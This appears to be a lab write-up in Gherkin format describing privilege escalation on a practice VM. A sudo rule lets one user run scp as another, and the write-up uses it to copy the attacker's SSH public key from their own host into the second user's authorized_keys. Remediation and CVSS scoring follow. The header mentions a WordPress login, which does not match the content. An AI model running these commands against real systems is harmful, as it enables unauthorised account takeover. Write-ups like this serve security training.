## Version 1.4.1
## language: en

Feature: login admin in wordpress
  TOE:
    CK-00
  Category:
    Privilege Issues
  Location:
    http://ck/wp-admin/
  CWE:
    CWE-267: Privilege Defined With Unsafe Actions
  Rule:
    REQ.269: https://fluidattacks.com/web/rules/269/
  Goal:
    Privilege escalation to collect all the flags
  Recommendation:
    Don't give unnecessary privileges such as run commands as another user

  Background:
  Hacker's software:
    | <Software name> | <Version>         |
    | Ubuntu (Bionic) | 18.04.4 LTS       |
    | GNU bash        | 4.4.20(1)-release |
    | OpenSSh         | 7.6p1             |
  TOE information:
    Given access to bla user of CK~00 VM by SSH connection

  Scenario: Normal use case
    Given the connection established
    Then I checked normal user control creating a new file
    And removing it in the current directory

  Scenario: Static detection
    Given there isn't any code
    Then there isn't a static detection either

  Scenario: Dynamic detection
    Given I tried to edit file in other users directories
    And It rejected me because I don't have permissions
    When I run the command below to check if I can get root privileges
    """
    $ sudo -l
    """
    And this was the output
    """
    [sudo] password for bla:
    Matching Defaults entries for bla on ck00:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:
    /usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User bla may run the following commands on ck00:
        (bla1) /usr/bin/scp
    """
    Then I know that I could manipulate bla1's directory using scp command

  Scenario: Exploitation
    Given the permission to use scp command as bla1 user
    Then I generated a ssh key in my linux
    And from bla I created and copy .ssh folder to bla1 directory
    """
    $ mkdir .ssh && sudo -u bla1 scp -r .ssh /home/bla1/
    """
    And I copied the public new ssh key to .ssh
    """
    $ sudo -u bla1 scp my-user@my-ip:/home/my-user/key.pub /home/bla1/.ssh/authorized_keys
    """
    And from my-user I tried to connect to bla1 by ssh
    """
    $ ssh -i key bla1@ck
    """
    And I got access to bla1 user

  Scenario: Remediation
  Remove (bla1) scp permission from bla's privileges
    Given I removed bla's permission using visudo
    Then I use again
    """
    $ sudo -l
    """
    And I got
    """
    [sudo] password for bla:
    Sorry, user bla may not run sudo on ck00.
    """
    And I confirmed the remediation works

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.1/10 (Critical) - AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.7/10 (High) - EE:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.4/10 (Medium) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-03
